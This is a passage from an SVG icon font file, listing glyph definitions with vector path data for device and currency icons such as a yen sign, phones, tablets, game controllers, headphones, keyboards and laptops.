<glyph glyph-name="yen-true" horiz-adv-x="1000" unicode="&#xea27;" d="M845 166c-22 22-52 36-86 38h-5c-35 0-67-15-90-38-23-23-37-55-37-90 0-18 4-35 10-51 7-15 16-28 27-40 23-23 55-37 91-37 70 0 127 57 127 128 0 35-14 67-37 90z m-24-60l-78-79c-2-2-6-2-8 0l-47 48c-2 2-2 6 0 8l11 11c2 2 6 2 8 0l32-33 63 63c2 2 5 2 8 0l11-11c2-2 2-5 0-7z m-199 296l209 378c-34 5-66 8-96 8-32 0-64-3-94-8l-161-339-164 339c-31 5-63 8-94 8-35 0-69-3-104-8l208-378h-148c-1-7-2-15-3-24-1-9-1-19-1-28 0-11 0-21 1-30 0-9 2-16 3-21h206v-86h-206c-1-6-2-14-3-23-1-10-1-19-1-29 0-11 0-20 1-29 0-9 2-17 3-22h206v-191c16-3 31-5 46-5 15-1 29-1 43-1 15 0 30 0 44 1 15 0 30 2 47 5v191h25c5 44 30 81 66 103h-91v85h227c1 7 2 15 3 25 0 9 1 19 1 30 0 21-2 37-4 49l-169 0z" />
<glyph glyph-name="yen" horiz-adv-x="1000" unicode="&#xea28;" d="M410 110h-205c-2 5-3 13-4 22-1 8-1 18-1 29 0 9 0 19 1 28 1 10 2 18 4 24h205v85h-205c-2 6-3 13-4 22-1 9-1 19-1 29 0 10 0 20 1 29 1 9 2 17 4 24h147l-208 378c35 5 69 8 104 8 31 0 63-3 94-8l164-339 161 339c31 5 62 8 94 8 30 0 62-3 96-8l-209-378h169c2-12 4-28 4-49 0-10-1-20-1-30 0-10-1-18-3-24h-227v-86h227c2-11 4-27 4-48 0-11-1-21-1-31 0-9-1-18-3-24h-227v-191c-16-3-32-4-46-5-15-1-29-1-44-1-14 0-29 0-44 1s-30 2-46 5v191z" />
<glyph glyph-name="android-nexus" horiz-adv-x="1000" unicode="&#xea29;" d="M745-13l0 736c1 55-5 93-67 107-30 7-61 11-93 14v2c-90 8-179 4-260-14-62-14-70-53-70-108l0-735c-2-55 4-104 70-119 30-6 63-11 95-14v-2c85-8 178-3 259 15 66 14 68 63 66 118z m-33-16h-424l-1 774h426l-1-774z" />
<glyph glyph-name="android-tablet" horiz-adv-x="1000" unicode="&#xea2a;" d="M761 850h-523c-22 0-40-18-40-40v-920c0-22 18-40 40-40h524c22 0 40 18 40 40v920c0 22-18 40-41 40z m-16-894h-487v784h487v-784z" />
<glyph glyph-name="apple-watch" horiz-adv-x="1000" unicode="&#xea2b;" d="M770 472c-2 0-3 2-3 5v4c0 45-20 85-52 112-13 11-27 31-29 47l-9 70c-2 16-3 43-8 59-13 47-56 81-108 81h-150c-52 0-95-34-108-81-5-16-6-43-8-59l-9-67c-2-17-16-36-29-46-35-27-57-69-57-116v-262c0-47 22-88 57-115 13-11 27-30 29-46l8-68c2-16 4-43 8-59 13-47 57-81 109-81h150c52 0 96 34 109 81 4 16 6 43 8 59l9 70c2 17 16 36 28 47 32 27 52 67 52 112v2s1 3 3 2c0 0 1 0 2 0 15 0 14 13 14 28v37c0 15 2 27-14 27-1 0-2 0-2 0-2 0-3 12-3 26s1 25 3 25c0 0 1 0 2 0 15 0 28 13 28 28v51c0 15-13 27-28 27-1 0-2 0-2 0z m-22-246c0-75-62-136-138-136h-248c-76 0-139 61-139 136v243c0 76 63 137 139 137h248c76 0 138-61 138-137v-243z" />
<glyph glyph-name="drawing-tablet" horiz-adv-x="1000" unicode="&#xea2c;" d="M99 463h48v-53h-48v53z m24-141c-13 0-24-11-24-24s11-25 24-25c14 0 24 11 24 25s-10 24-24 24z m-24-138h48v-54h-48v54z m793 312l-111-105c-1-2-3-5-3-7v-271h-533v371h434c2 0 6 1 7 3l112 110c2 2 2 3-1 3h-779c-10 0-18-8-18-19v-566c0-10 8-19 18-19h859c9 0 17 8 18 17 0 1 0 1 0 2v479c0 3-1 3-3 2z m-716-380c0-8-6-15-14-15h-78c-8 0-14 7-14 15v82c0 9 6 15 14 15h78c8 0 14-6 14-15v-82z m-53 128c-29 0-53 24-53 54s24 54 53 54c30 0 53-24 53-54s-23-54-53-54z m53 151c0-8-6-15-14-15h-78c-8 0-14 7-14 15v83c0 8 6 14 14 14h78c8 0 14-6 14-14v-83z m737 206l-34 35c-2 1-4 1-6 0l-296-299-22-84 82 23 296 299c2 2 2 5 0 6l-20 20z m86 47l-54 54c-2 2-4 2-6 0l-41-41c-1-1-1-4 0-6l54-54 1-2s3-1 4 0l42 43c1 1 1 4 0 6z" />
<glyph glyph-name="earphone" horiz-adv-x="1000" unicode="&#xea2d;" d="M358 703h62c11 0 20 8 22 18h105c14 0 25 11 25 25 0 13-11 25-25 25h-105c-2 10-11 18-22 18h-62v-86z m496 147h-51c-23 0-41-38-41-86s18-85 41-85h73v-103c0-9 6-17 14-20v-452c0-93-76-170-170-170h-258v90h189c82 0 149 67 149 149v115c8 3 14 11 14 20v158c0 64-52 116-116 116h-52c-22 0-41-38-41-86s19-85 41-85h74v-103c0-9 6-17 14-20v-115c0-45-37-83-83-83h-189c-1 13-11 23-23 23h-46c-13 0-23-10-23-23v-75h-190c-46 0-83 37-83 82v532c0 22 9 43 25 58 15 16 37 24 58 24h1l49 0c4-5 10-8 16-8h63v86h-63c-8 0-15-5-19-12l-45 0c-39 1-78-15-106-42-29-28-45-67-45-106v-532c0-82 67-149 149-149h190v-75c0-13 10-23 23-23h46c11 0 19 8 22 18h259c130 0 236 106 236 236v452c8 3 14 11 14 20v158c0 64-52 116-116 116z" />
<glyph glyph-name="flash-drive" horiz-adv-x="1000" unicode="&#xea2e;" d="M598 642c-30 30-80 30-110 0l-464-464c-14-14-21-32-21-51 0-31 46-76 77-106l149-150c28-28 74-28 102 0l464 464c30 30 30 80 0 110l-197 197z m202 208l-160-160 197-197 160 160-197 197z m17-158l-40 41 33 32 40-40-33-33z m21-21l33 33 41-40-33-33-41 40z" />
<glyph glyph-name="game-console" horiz-adv-x="1000" unicode="&#xea2f;" d="M905 90c-13 23-25 45-38 68-8 14-16 29-27 42-20 26-46 42-81 40-18-1-35 0-52 0h-47c6-37-11-62-37-82-7-6-16-11-24-15-27-14-56-20-87-22-49-2-95 7-136 37-16 12-30 27-34 48-3 10-3 22-4 33-1 0-4 1-7 1-32 0-64-1-96 0-19 0-36-6-51-17-16-11-29-25-38-42-17-30-35-60-51-92-8-15-14-32-16-48-3-25-2-49-2-74 0-32 23-54 55-54 245-1 491-1 736 0 32 0 54 22 54 54 0 18 0 37 0 56 1 24-5 46-17 67z m-516-107c0-6-4-11-10-11h-245c-6 0-10 5-10 11v14c0 6 4 10 10 10h245c6 0 10-4 10-10v-14z m341-12c-10 0-19 9-18 19 0 10 8 19 18 18 10 0 18-8 18-18 0-10-8-19-18-19z m89-20c-21 0-38 18-38 39 0 21 18 39 39 39 21 0 39-18 38-39 0-22-17-39-39-39z m-319 837c-75 0-136-41-136-90 0-18 8-34 22-48-1-11 0-22 1-32l17-207c5-60 10-121 15-181 3-37 27-58 64-58h39c32 1 56 23 59 54 7 74 12 147 19 221 5 63 10 126 15 189 0 5 0 9 0 14 13 14 21 30 21 48 0 49-61 90-136 90z m0-109c-52 0-94 19-94 43 0 24 42 44 94 44s94-20 94-44c0-24-42-43-94-43z" />
<glyph glyph-name="game-controller" horiz-adv-x="1000" unicode="&#xea30;" d="M815 124c-9 0-16-8-16-17 0-9 7-17 16-17 10 0 17 8 17 17s-7 17-17 17z m0 152c-9 0-16-8-16-17 0-9 7-17 16-17 10 0 17 8 17 17 0 9-7 17-17 17z m-150-118c-10 0-17-8-17-17 0-10 7-17 17-17 9 0 16 8 16 17 0 9-7 17-16 17z m0 152c-10 0-17-8-17-17s7-17 17-17c9 0 16 7 16 17s-7 17-16 17z m317-71c-48 180-183 300-300 269-45-12-117-42-168-46v50h0c0 3 0 6 0 9 0 51-41 93-92 93h-134c-33 0-59 26-59 59 0 32 26 59 59 59h192c19 0 34 15 34 34v67c0 9-8 17-17 17s-17-8-17-17v-34c0-33-1-33-33-33h-159c-51 0-93-42-93-93 0-52 42-93 93-93h134c32 0 58-27 58-59 0-3 0-6 1-9h-1v-50c-50 4-121 34-165 46-116 31-249-90-297-270-48-180 7-352 123-383 87-23 183 38 246 145 35-7 72-11 110-11 39 0 76 6 111 14 64-107 161-168 249-145 118 31 174 202 125 381z m-652-31h-67v-67c0-10-8-17-17-17s-17 8-17 17v67h-67c-9 0-17 8-17 17s8 17 17 17h67v68c0 9 8 16 17 16 9 0 17-7 17-16v-68h67c9 0 16-8 16-17s-7-17-16-17z m335-118c-28 0-51 23-51 51 0 28 23 50 51 50s50-22 50-50c0-28-23-51-50-51z m0 152c-28 0-51 23-51 51 0 28 23 50 51 50s50-22 50-50c0-28-23-51-50-51z m150-186c-27 0-50 23-50 51 0 28 23 51 50 51 28 0 51-23 51-51 0-28-23-51-51-51z m0 152c-27 0-50 23-50 51 0 28 23 51 50 51 28 0 51-23 51-51 0-28-23-51-51-51z" />
<glyph glyph-name="game-pad" horiz-adv-x="1000" unicode="&#xea31;" d="M353 622c28 0 56 1 84 0 9 0 16 3 21 11 5 8 13 12 23 12 13-1 25-1 38 0 10 0 18-3 23-12 5-8 13-11 22-11 54 1 109 1 163 1 85-1 164-69 182-154 5-28 4-55 1-83-3-18-1-37 1-55l23-190c2-20 5-41 2-60-5-43-182-27-208 24-20 38-38 77-59 116-4 8-12 15-20 19-26 13-50 28-70 50-5 6-15 10-22 10-38 1-76 0-114 0-9 0-16-3-22-10-19-21-41-38-68-48-11-5-19-13-24-24-18-37-29-77-54-109-52-65-212-70-212-16 0 32 5 64 9 95 6 59 14 118 20 177 1 10-1 21-3 31-15 102 50 204 156 223 27 5 55 3 82 3 9 1 17 0 26 0z m-139-166c-30 0-30 0-30-31 0-1 0-2 0-2-1-10 4-14 12-13 10 0 20 0 29-1 18-2 26 12 35 23 1 1 1 6 0 7-8 8-15 19-29 18-5-1-11-1-17-1z m131 0c-6 0-12 0-18 1-14 1-20-11-29-18-1-2 0-8 2-10 10-13 22-23 40-20 5 1 11 0 17 1 16 0 17 1 17 17 0 29 0 29-29 29z m-87 76v-12c0-14-2-29 1-42 2-9 12-16 18-24 1-1 3-1 4 0 7 9 18 16 21 27 4 13 2 28 1 42 0 4-5 9-8 9-12 1-23 0-37 0z m0-163c0-8 1-16 0-23 0-6 2-8 8-8 9 0 18 0 27 0 7 0 10 3 10 10 0 10-1 20 0 29 3 19-9 28-20 39-1 1-6 1-7 0-9-9-20-16-18-32 1-5 0-10 0-15z m432-10c0-17 14-31 31-31 17 0 30 15 30 32 0 17-14 32-31 31-17 0-30-14-30-32z m-42 44c17-1 31 14 31 31 0 17-14 32-31 32-16 0-30-14-30-32 0-17 13-31 30-31z m175 31c0 18-14 32-30 32-17 0-31-15-31-32 1-17 14-31 31-31 17 0 30 14 30 31z m-133 75c0-18 13-32 30-32 17 0 31 14 31 31 0 18-13 32-30 32-17 0-31-13-31-31z m-190 28c12 0 24 0 37-1 8 0 15 3 15 13 0 10-7 12-16 12-25 0-49 0-74 0-9 0-16-2-15-13 0-10 6-11 14-11 13 0 26 0 39 0z" />
<glyph glyph-name="game" horiz-adv-x="1000" unicode="&#xea32;" d="M996 187c-23 133-141 233-277 234-73 1-146 1-218 1v0c-66 0-131 1-196-1-28 0-58-1-86-7-211-51-290-309-145-470 56-61 127-93 211-94 128 0 256 0 384 0 41 0 82-1 122 10 142 41 230 180 205 327z m-604-86h-105v-107h-72v106h-107v71h106v107h72v-106h106v-71z m233-135c-44 0-80 37-80 81 0 43 37 80 79 80 45 0 82-36 82-80 0-44-37-81-81-81z m179 143c-45 1-81 37-81 81 1 44 37 80 81 80 44 0 80-37 80-82 0-42-37-79-80-79z m-467 563c122 0 245 0 368 0 3 0 6-1 9-1v-71h-46c-56 0-112 0-167 0-23 0-33-9-36-31-1-9 0-18 0-27-1-28 0-56 0-84h107v35h16c56 0 112 0 169 0 32 0 64 30 64 60 1 57 1 114 1 171 0 17-8 29-20 39-16 13-34 16-54 16-100 0-201 0-301 0h-54v71h-107c0-45-1-90 1-134 1-28 22-44 50-44z" />
<glyph glyph-name="headphone-alt-1" horiz-adv-x="1000" unicode="&#xea33;" d="M651 155c-7 0-12 2-15 8-3 6-6 12-8 18-2 5-5 9-8 13-10 10-23 9-31-3-5-8-7-18-10-28-2-9-3-18-7-26-1-1-1-3-3-3-3 0-3 2-3 4-4 13-5 27-7 41-3 23-4 45-12 67-2 4-4 9-7 13-8 10-17 8-22 6l0 0c-1-1-1-1-1-1-1 0-2-1-3-2l0 0 0 0-1-1 0 0c-1-1-2-2-3-3l0 0c-2-3-4-6-5-9-3-6-4-12-6-18-6-31-7-62-10-92-1-14-3-27-6-39 0-2 0-4-2-4-2 0-2 2-3 3-2 7-4 14-6 21-4 19-6 38-11 57-2 8-5 17-10 24-8 10-20 10-28 1-3-3-5-7-7-10-6-15-8-30-11-46-1-9-3-17-6-26 0-1-1-3-3-3-1 0-2 2-2 3-2 3-3 6-4 9-3 10-6 21-13 30-6 9-15 14-26 14-13 0-25 0-38 0-2 0-4 0-5-1v-18c1-1 3-1 5-1 12 0 24 0 36 0 6 0 11-3 14-8 3-7 5-14 8-22 2-6 5-13 9-19 9-13 25-13 34 1 6 11 8 24 11 36 2 12 4 25 7 36 1 2 1 3 2 5 0 1 1 3 2 2 2 0 2-1 3-2 2-7 4-15 5-22 5-20 7-40 13-59 1-4 2-8 4-12 3-9 9-16 19-19h4c8 2 13 8 16 16 5 15 7 30 9 45 3 29 3 57 8 86 1 7 3 15 5 22 1 1 1 3 3 3 2 0 3-2 3-4 4-10 6-22 8-33 3-22 4-45 9-67 1-6 3-12 6-17 8-15 23-12 31-5 6 7 10 15 12 24 3 11 6 22 9 33 0 1 0 4 3 4 2 0 3-2 3-4 4-7 6-15 11-21 7-11 16-17 30-17 14 1 28 0 42 0v20c-14 0-28 0-41 0z m-651-77c18-8 35-16 54-25v165c-19-9-36-17-54-25v-115z m784 553c-104 91-226 117-359 98-191-28-339-191-345-381-3-107 0-214 0-321 0-36 26-61 62-62 28 0 57 0 85 0 44 1 68 24 68 68 0 68 0 136 0 204 0 45-25 70-70 70-24 0-49 0-75 0-3 134 47 240 161 307 130 77 265 74 392-9 105-68 151-170 147-298-27 0-52 1-77 0-42 0-67-25-68-67 0-69 0-138 0-207 1-42 24-66 66-67 26-1 53-1 79-1 47 1 70 25 70 72 0 100 1 200 0 300-1 118-48 216-136 294z m216-452c0 5-1 12-4 14-16 10-32 18-50 27v-167c14 7 27 15 40 20 10 5 14 11 14 23-1 28 0 55 0 83z" />
<glyph glyph-name="headphone-alt-2" horiz-adv-x="1000" unicode="&#xea34;" d="M787 347c-1 78 2 157-21 233-43 142-145 211-294 198-127-11-206-74-239-206-29-120-33-243 6-362 28-88 83-158 170-197 18-8 30-11 43 9 26 39 77 52 120 37 48-18 72-56 70-112-2-44-34-82-79-94-45-11-94 7-116 47-12 22-27 32-49 40-117 43-186 133-227 246-7 19-14 29-34 35-40 11-75 33-101 66-63 80-42 194 52 241 49 24 70 54 84 105 36 134 144 212 287 216 58 2 115 2 172-15 122-35 184-123 210-241 5-24 12-38 38-47 81-30 123-92 120-172-1-34-14-64-36-89-39-46-89-69-148-76-20-2-31 2-29 26 2 37 0 75 1 112z" />
<glyph glyph-name="headphone-alt-3" horiz-adv-x="1000" unicode="&#xea35;" d="M0 78c18-8 35-16 54-25v165c-19-9-36-17-54-25v-115z m784 553c-104 91-226 117-359 97-191-27-339-190-345-380-3-107 0-214 0-321 0-36 26-61 62-61 28-1 57-1 85-1 44 1 68 24 68 68 0 68 0 136 0 204 0 45-25 70-70 70-24 0-49 0-75 0-3 134 47 240 161 307 130 77 265 74 393-9 104-68 150-170 146-298-27 0-52 0-77 0-42 0-67-25-67-67-1-69-1-138 0-207 0-42 23-66 65-67 26-1 53-1 79-1 47 1 70 25 70 72 0 100 1 200 0 300-1 118-48 216-136 294z m216-452c-1 5-1 12-5 14-15 10-31 18-49 27v-167c14 7 27 15 40 20 10 5 14 11 14 23-1 28 0 55 0 83z" />
<glyph glyph-name="headphone-alt" horiz-adv-x="1000" unicode="&#xea36;" d="M78 53h42c-8-161 160-193 291-187 5-10 15-16 27-16h133c17 0 31 14 31 31v28c0 17-14 31-31 31h-133c-15 0-28-11-31-25-106-6-242 10-237 138h57c15 0 27 12 27 26v311c0 14-12 26-27 26h-80c11 191 169 349 355 349 186 0 345-158 355-349h-84c-15 0-26-12-26-26v-311c0-14 11-26 26-26h150c14 0 26 12 26 26v311c0 6-2 12-6 17-6 241-205 443-441 443-234 0-432-200-440-440-6-4-10-12-10-20v-311c0-14 11-26 26-26z" />
<glyph glyph-name="headphone" horiz-adv-x="1000" unicode="&#xea37;" d="M873 349c-4 215-169 388-373 388s-370-173-373-388c-37-12-64-49-64-93v-195c0-54 40-98 89-98h71v1c17 1 30 16 30 34v314c0 18-13 32-29 34 2 160 125 289 276 289s274-129 276-289c-16-2-29-16-29-34v-315c0-18 13-32 30-33v-1h71c50 0 90 44 90 98v195c0 44-28 82-65 93z" />
<glyph glyph-name="htc-one" horiz-adv-x="1000" unicode="&#xea38;" d="M693 850h-376c-28 0-56-18-56-47v-895c0-29 28-58 56-58h376c28 0 46 29 46 58v895c0 29-18 47-46 47z m36-942c0-23-15-47-37-47h-376c-22 0-45 24-45 47v21h458l0-21z m-437 79v768h416v-768h-416z m437 789h-458v27c0 23 23 36 45 36h376c23 0 37-13 37-36l0-27z" />
<glyph glyph-name="imac" horiz-adv-x="1000" unicode="&#xea39;" d="M656-14s-18 15-27 25c-10 9-12 19-12 19l-8 80h-210l-7-80s-3-11-13-21c-9-9-26-24-26-24s-16-12 7-15c14-2 74-5 122-5h45c49 0 108 3 121 5 23 4 8 16 8 16z m323 749h-950c-14 0-29-10-29-23v-558c0-14 15-30 29-30h950c14 0 21 16 21 30v558c0 13-7 23-21 23z m-20-566h-921v522h921v-522z" />
<glyph glyph-name="ipad" horiz-adv-x="1000" unicode="&#xea3a;" d="M836 850h-672c-22 0-39-18-39-40v-920c0-22 17-40 39-40h672c22 0 39 18 39 40v920c0 22-17 40-39 40z m-337-978c-12 0-22 10-22 22s10 23 22 23 22-10 22-23-10-22-22-22z m299 63h-601v830h601v-830z" />
<glyph glyph-name="iphone" horiz-adv-x="1000" unicode="&#xea3b;" d="M673 850h-346c-37 0-67-30-67-67v-866c0-37 30-67 67-67h346c37 0 67 30 67 67v866c0 37-30 67-67 67z m-213-55c0 6 5 10 11 10h58c6 0 11-4 11-10v-19c0-6-5-11-11-11h-58c-6 0-11 5-11 11v19z m45-900c-24 0-44 19-44 43s20 44 44 44 43-19 43-44c0-24-19-43-43-43z m195 115h-400v720h400v-720z" />
<glyph glyph-name="ipod-nano" horiz-adv-x="1000" unicode="&#xea3c;" d="M707 850h-414c-12 0-21-10-21-21v-958c0-11 9-21 21-21h414c12 0 21 9 21 21v958c0 11-9 21-21 21z m-207-893c-89 0-160 72-160 161s71 161 160 161c88 0 160-72 160-161s-72-161-160-161z m184 408h-368v437h368v-437z m-104-245c0-45-36-81-80-81-44 0-80 36-80 81 0 44 36 80 80 80 44 0 80-36 80-80z" />
<glyph glyph-name="ipod-touch" horiz-adv-x="1000" unicode="&#xea3d;" d="M682 850h-364c-41 0-74-33-74-74v-852c0-41 33-74 74-74h364c41 0 74 33 74 74v852c0 41-33 74-74 74z m-179-959c-27 0-48 22-48 48s21 49 48 49 48-22 48-49-22-48-48-48z m217 134h-440v656h440v-656z" />
<glyph glyph-name="keyboard-alt" horiz-adv-x="1000" unicode="&#xea3e;" d="M961 437h-438c-20 0-56 27-61 43l-1 1c-12 24 4 43 22 65 3 3 5 6 7 9 66 74 81 125-19 199l-18-17c79-59 82-93 15-169-2-3-5-6-7-9-19-23-42-51-25-86 4-12 16-25 31-36h-428c-21 0-39-15-39-33v-425c0-18 18-33 39-33h922c22 0 39 15 39 33v425c0 18-17 33-39 33z m12-458c0-6-5-10-12-10h-922c-7 0-12 4-12 10v425c0 6 5 10 12 10h922c7 0 12-4 12-10v-425z m-837 367h86v-71h-86v71z m127 0h85v-71h-85v71z m131 0h86v-71h-86v71z m128 0h86v-71h-86v71z m127 0h85v-71h-85v71z m127 0h86v-71h-86v71z m-512-244h345v-72h-345v72z m84 54v71h-212v-71h212z m-212-54h86v-72h-86v72z m258 125h85v-71h-85v71z m127 0h86v-71h-86v71z m127 0h85v-71h-85v71z m127 0h86v-71h-86v71z m-126-125h85v-72h-85v72z m127 0h86v-72h-86v72z" />
<glyph glyph-name="keyboard-wireless" horiz-adv-x="1000" unicode="&#xea3f;" d="M858 273h-104c-5 0-9-4-9-9v-57c-1-6 4-10 9-10h104c5 0 9 5 9 10v57c0 5-4 9-9 9z m-142 0h-434c-5 0-9-4-9-9v-57c0-5 4-10 9-10h434c5 0 10 4 10 10v57c0 5-5 9-10 9z m-470 0h-104c-5 0-9-4-9-9v-57c0-6 4-10 9-10h104c5 0 9 5 9 10v57c0 5-4 9-9 9z m-104 154h95c5 0 9 4 9 9v57c0 5-4 10-9 10h-95c-5 0-9-5-9-10v-57c0-5 4-9 9-9z m602 0h113c5 0 10 4 10 9v57c0 5-5 10-10 10h-113c-5 0-9-5-9-10v-57c1-5 5-9 9-9z m-470 0h56c6 0 10 4 10 9v57c0 5-4 10-10 10h-56c-6 0-10-5-10-10v-57c0-5 4-9 10-9z m93 0h57c5 0 10 4 10 9v57c0 5-5 10-10 10h-57c-5 0-9-5-9-10v-57c0-5 4-9 9-9z m95 0h56c6 0 10 4 10 9v57c0 5-4 10-10 10h-56c-5 0-10-5-10-10v-57c0-5 5-9 10-9z m94 0h57c5 0 9 4 9 9v57c0 5-4 10-9 10h-57c-5 0-9-5-9-10v-57c0-5 5-9 9-9z m94 0h57c5 0 9 4 9 9v57c0 5-4 10-9 10h-57c-5 0-10-5-10-10v-57c1-5 5-9 10-9z m-508-115h57c5 0 10 4 10 9v57c0 5-5 10-10 10h-57c-5 0-9-5-9-10v-57c0-5 4-9 9-9z m94 76c-5 0-10-5-10-10v-57c1-5 5-9 10-9h57c5 0 9 4 9 9v57c0 5-4 10-9 10h-57z m94 0c-5 0-9-5-9-10v-57c0-5 4-9 9-9h57c5 0 10 4 10 9v57c0 5-5 10-10 10h-57z m95 0c-5 0-10-5-10-10v-57c0-5 4-9 10-9h57c5 0 9 4 9 9v57c0 5-4 10-9 10h-57z m93 0c-5 0-9-5-9-10v-57c1-5 4-9 9-9h57c5 0 10 4 10 9v57c0 5-5 10-10 10h-57z m95 0c-5 0-10-5-10-10v-57c0-5 4-9 10-9h57c5 0 9 4 9 9v57c0 5-4 10-9 10h-57z m94 0c-6 0-10-5-10-10v-57c1-5 4-9 10-9h56c5 0 10 4 10 9v57c0 5-5 10-10 10h-56z m151 0h-57c-5 0-10-5-10-10v-57c0-5 5-9 10-9h57c5 0 9 4 9 9v57c0 5-4 10-9 10z m125 233h-966c-10 0-17-8-17-18v-506c0-10 7-18 17-18h966c10 0 17 8 17 18v506c0 10-7 18-17 18z m-3-504c0-11-7-19-17-19h-926c-9 0-17 8-17 19v466c0 10 8 19 17 19h926c10 0 17-9 17-19v-466z" />
<glyph glyph-name="keyboard" horiz-adv-x="1000" unicode="&#xea40;" d="M937 350l-234 383c-2 4-7 5-10 3l-302-184c-4 2-12 8-14 17-3 12 5 29 23 48 24 26 34 51 31 75-5 33-33 50-34 51l-15-25c0-1 17-11 20-30 2-15-6-32-24-51-25-27-35-52-30-75 3-12 10-20 16-27l-298-182c-1-1-3-2-3-4-1-2 0-4 1-6l233-383c2-2 4-3 7-3 1 0 2 0 4 1l626 382c4 2 5 7 3 10z m-162 119l-66-39-39 65 65 40 40-66z m-107 175l40-65-65-40-40 65 65 40z m-2-241l-66-40-40 65 66 40 40-65z m-107 174l40-65-65-39-40 65 65 39z m-8-244l-65-40-40 66 66 40 39-66z m-66 110l-65-40-40 65 65 40 40-65z m-44-177l-65-40-40 65 65 40 40-65z m-107 174l40-65-65-39-40 65 65 39z m-175-107l65 40 40-65-65-40-40 65z m67-109l65 40 40-65-65-40-40 65z m101-171l-39 64 293 178 39-63-293-179z m337 206l-40 65 65 40 40-65-65-40z m109 66l-40 66 65 39 40-65-65-40z" />
<glyph glyph-name="laptop-alt" horiz-adv-x="1000" unicode="&#xea41;" d="M125 135h751c7 0 12 6 12 13v486c0 7-5 13-12 13h-751c-8 0-13-6-13-13v-486c0-7 5-13 13-13z m45 441c0 7 6 13 13 13h634c7 0 13-6 13-13v-370c0-7-6-13-13-13h-634c-7 0-13 6-13 13v370z m817-462h-974c-7 0-13-6-13-13v-35c0-8 6-13 13-13h974c7 0 13 5 13 13v35c0 7-6 13-13 13z m-405-36h-164v10h164v-10z" />
<glyph glyph-name="laptop" horiz-adv-x="1000" unicode="&#xea42;" d="M856 146v427c0 11-4 21-11 28-6 8-15 14-24 14h-646c-17 0-31-17-31-38v-426c0-1 0-3 1-5h-82v-18c0-10 4-19 10-26 7-10 19-16 32-16h794c21 0 39 16 39 37v23h-82z m-356 462c6 0 11-5 11-11 0-6-5-11-11-11-6 0-11 5-11 11 0 6 5 11 11 11z m56-476h-116v11h116v-11z m269 43h-653v402h653v-402z" />
<glyph glyph-name="macbook" horiz-adv-x="1000" unicode="&#xea43;" d="M124 125h752c15 0 27 12 27 27v447c0 15-12 27-27 27h-752c-15 0-27-12-27-27v-447c0-15 12-27 27-27z m-2 185v291h756v-452h-756v161z m781-198v1h-25v-1h-290v-3c0-9-7-17-16-17h-144c-8 0-16 8-16 17v3h-290v1h-25v-1h-97v-11c0-15 12-27 27-27h946c15 0 27 12 27 27v11h-97z" />
<glyph glyph-name="magic-mouse" horiz-adv-x="1000" unicode="&#xea44;" d="M740 689c-8 99-99 159-244 161-143-2-229-61-238-161-8-104-12-367-10-452 0-14 0-27 1-40 1-62 2-110 9-171 4-40 35-171 238-173v-1h5v-2c190 4 229 95 238 175 9 73 11 129 13 212 1 85-4 351-12 452z m2-452c-2-83-4-138-12-211-6-49-19-164-234-166-194 2-224 127-228 166-7 60-8 109-9 171-1 13-1 26-1 40-2 83 2 349 10 451 8 95 91 150 228 152 139-2 226-59 234-152 8-101 14-366 12-451z m-219-126c-6 0-13-4-17-9-4-4-7-11-6-18 6 0 13 4 17 9 4 4 7 11 6 18z m9-62c0 15 12 22 12 22-7 10-17 12-21 12-9 1-18-5-22-5-5 0-12 5-20 5-9 0-19-6-24-15-10-18-2-44 8-59 5-7 10-15 18-15 8 1 10 5 19 5 9 0 12-5 19-4 8 0 13 7 18 14 6 8 8 16 8 17 0 0-15 5-15 23z" />
<glyph glyph-name="micro-chip" horiz-adv-x="1000" unicode="&#xea45;" d="M835 514h96c4 0 7 3 7 6v63c0 4-3 7-7 7h-96c-3 0-6 3-6 6v78c0 3-3 6-6 6h-79c-4 0-7 3-7 6v93c0 3-3 6-6 6h-63c-4 0-7-3-7-6v-93c0-3-2-6-6-6h-44c-4 0-6 3-6 6v93c0 3-3 6-7 6h-63c-3 0-6-3-6-6v-93c0-3-3-6-7-6h-44c-3 0-6 3-6 6v93c0 3-3 6-6 6h-64c-3 0-6-3-6-6v-93c0-3-3-6-7-6h-44c-3 0-6 3-6 6v93c0 3-3 6-7 6h-63c-3 0-6-3-6-6v-93c0-3-3-6-6-6h-79c-4 0-7-3-7-6v-78c0-3-3-6-6-6h-96c-4 0-6-3-6-6v-64c0-3 2-6 6-6h96c3 0 6-3 6-6v-45c0-3-3-6-6-6h-96c-4 0-6-3-6-6v-63c0-4 2-7 6-7h96c3 0 6-2 6-6v-44c0-4-3-7-6-7h-96c-4 0-6-2-6-6v-63c0-4 2-6 6-6h96c3 0 6-3 6-7v-44c0-3-3-6-6-6h-96c-4 0-6-3-6-7v-63c0-3 2-6 6-6h96c3 0 6-3 6-6v-81c0-3 3-6 7-6h79c3 0 6-3 6-7v-94c0-4 3-6 6-6h63c4 0 7 2 7 6v94c0 4 3 7 6 7h44c4 0 7-3 7-7v-94c0-4 2-6 6-6h63c4 0 6 2 6 6v94c0 4 3 7 7 7h44c4 0 6-3 6-7v-94c0-4 3-6 7-6h63c4 0 6 2 6 6v94c0 4 3 7 7 7h44c3 0 6-3 6-7v-94c0-4 3-6 7-6h63c3 0 6 2 6 6v94c0 4 3 7 6 7h79c4 0 7 3 7 6v81c0 3 3 6 6 6h96c4 0 6 3 6 6v63c0 4-2 6-6 6h-96c-3 0-6 3-6 7v44c0 4 3 6 6 6h96c4 0 6 3 6 7v63c0 3-2 6-6 6h-96c-3 0-6 3-6 6v45c0 3 3 6 6 6h96c4 0 6 3 6 6v64c0 3-2 6-6 6h-96c-3 0-6 3-6 6v44c0 4 3 7 6 7z m-217-275c0-3-3-6-6-6h-224c-3 0-6 3-6 6v224c0 3 3 6 6 6h224c3 0 6-3 6-6v-224z m-60 182h-116c-7 0-13-6-13-13v-116c0-7 6-13 13-13h116c7 0 13 6 13 13v116c0 7-6 13-13 13z" />
<glyph glyph-name="microphone-alt" horiz-adv-x="1000" unicode="&#xea46;" d="M871 459c-73 20-141 58-197 114-56 56-94 124-114 197-48-77-31-188 46-265 77-77 188-94 265-46z m-305-342c-96 0-164-60-225-113-67-58-124-109-210-83-17 13-17 23-17 26-1 24 27 55 40 66 2 1 3 3 4 5 23-8 49-3 67 15l436 359c-36 15-70 37-100 67s-53 65-68 101l-359-437c-16-16-21-38-16-58-2-1-3-1-5-2-6-6-66-57-63-119 1-21 10-52 49-78l8-4c25-8 48-12 70-12 85 0 149 56 206 106 57 50 111 97 183 97 165 0 293-177 295-179 10-15 30-18 44-8 15 10 18 30 8 45-6 8-148 206-347 206z m312 660c-77 77-188 94-265 46 13-76 49-148 106-205 58-57 129-93 205-106 48 77 31 188-46 265z" />
